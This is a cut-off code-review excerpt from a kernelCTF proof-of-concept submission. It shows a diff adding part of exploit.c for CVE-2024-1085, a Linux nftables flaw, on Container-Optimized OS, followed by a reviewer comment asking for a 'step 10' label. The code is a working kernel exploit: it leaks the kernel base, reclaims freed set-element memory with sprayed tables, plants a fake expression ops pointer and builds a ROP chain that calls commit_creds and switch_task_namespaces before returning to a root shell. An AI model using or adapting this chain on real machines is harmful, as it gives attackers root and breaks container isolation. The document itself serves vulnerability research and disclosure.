pocs/linux/kernelctf/CVE-2024-1085_cos/exploit/cos-105-17412.226.43/exploit.c

```diff
@@ -0,0 +1,339 @@
+	if(((*(uint64_t *)(table_udata+0x28)) & 0xfff ) == 0x760){
+    	    break;	
+	}
+	i++;
+    }
+    
+    //Save it. We will use it later.
+    char *setelem_data = malloc(0x100);
+    memcpy(setelem_data, table_udata, 0xd0);
+    kernel_off = *(uint64_t *)(table_udata+0x28) - 0xFFFFFFFF828C9760;
+    
+    //now we get ops, we try to add a small setelem and leak it. We will use this setelem as expr->ops target.
+    bitmap_key++;
+    new_setelem(socket, table, bitmap_set, pad, 0x60, NULL, &bitmap_key, 2, NULL, 0, 0);
+    
+    snprintf(tmp, 0x100, "table for test %d", b);
+    get_table(socket2, tmp);
+    nl_recvmsgs_default(socket2);
+    nl_recvmsgs_default(socket2);
+    printf("Get next setelem : %llx\n",*(uint64_t *)table_udata);
+    
+    uint64_t ops_addr = *(uint64_t *)table_udata;
+    //Free the small setelem, and fill it with our target expr->ops->dump and expr->ops->type
+    del_setelem(socket, table, bitmap_set, &bitmap_key, 2, NULL, 0);
+    //ops->dump
+    *(uint64_t *)&pad[0x40] = kernel_off + 0xffffffff8116f78b;//leave ; ret
+    //ops->type
+    *(uint64_t *)&pad[0x70] = kernel_off + 0xFFFFFFFF835199E0;//last type
+    spray_tables(socket,0x400, pad, 0x80);
+    //Now we try to control ip by faking another expr in set elem.
+    //build fake setelem
+    *(uint64_t *)&setelem_data[0x28] = ops_addr; //expr[0]->ops
+    //start ROP
+    *(uint64_t *)&setelem_data[0x30] = kernel_off + 0xffffffff81080450;//pop rdi; ret
+    *(uint64_t *)&setelem_data[0x38] = kernel_off + 0xFFFFFFFF83262140;//init_cred
+    *(uint64_t *)&setelem_data[0x40] = kernel_off + 0xFFFFFFFF8110CF50;//commit_creds;
+    *(uint64_t *)&setelem_data[0x48] = kernel_off + 0xffffffff81080450;//pop rdi ; ret
+    *(uint64_t *)&setelem_data[0x50] = 1;
+    *(uint64_t *)&setelem_data[0x58] = kernel_off + 0xFFFFFFFF81103DC0;//find_task_by_vpid
+    *(uint64_t *)&setelem_data[0x60] = kernel_off + 0xffffffff8102c691;//mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret
+    *(uint64_t *)&setelem_data[0x68] = 0;
+    *(uint64_t *)&setelem_data[0x70] = kernel_off + 0xFFFFFFFF8124C52C;//pop rsi ; ret
+    *(uint64_t *)&setelem_data[0x78] = kernel_off + 0xFFFFFFFF83261F00;//init_nsproxy
+    *(uint64_t *)&setelem_data[0x80] = kernel_off + 0xFFFFFFFF8110B570;//switch_task_namespaces
+    *(uint64_t *)&setelem_data[0x88] = kernel_off + 0xFFFFFFFF81FE3C87;//swapgs; ret
+    *(uint64_t *)&setelem_data[0x90] = kernel_off + 0xFFFFFFFF820011A7;//iretq
+    *(uint64_t *)&setelem_data[0x98] = (uint64_t)shell;
+    *(uint64_t *)&setelem_data[0xa0] = user_cs;
+    *(uint64_t *)&setelem_data[0xa8] = user_rflags;
+    *(uint64_t *)&setelem_data[0xb0] = user_rsp|8;
+    *(uint64_t *)&setelem_data[0xb8] = user_ss;
+    
+    //del table b first
+    del_table(socket, tmp);
+    //Try to get it back and control RIP
+    bitmap_key = i;
+    int t=0;
+    while(1){
+    	spray_tables(socket, 1, setelem_data, 0xd0);
```

Comment:
Comment here that this is "step 10" based on the writeup. Also include what does it do:
> Fill the heap memory of `nft_table D ->udata` with fake `nft_expr` and ROP gadget.